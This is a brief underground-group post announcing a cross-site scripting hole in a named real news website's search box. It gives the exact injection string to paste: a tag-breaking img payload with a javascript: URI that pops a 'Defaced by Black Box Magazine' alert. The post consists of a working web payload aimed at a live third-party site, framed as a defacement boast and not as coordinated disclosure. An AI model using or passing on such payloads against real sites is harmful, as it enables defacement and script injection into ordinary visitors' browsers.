We from Black Box Magazine - Underground Inet-Security Research -- http://bboxnet.mine.nu found Cross Site Scripting Vuln in http://www.newscientist.com/ Write this example in Search: "><img src=javascript:a=/Defaced%20by%20Black%20Box%20Magazine/><img src=javascript:alert(a.source)>
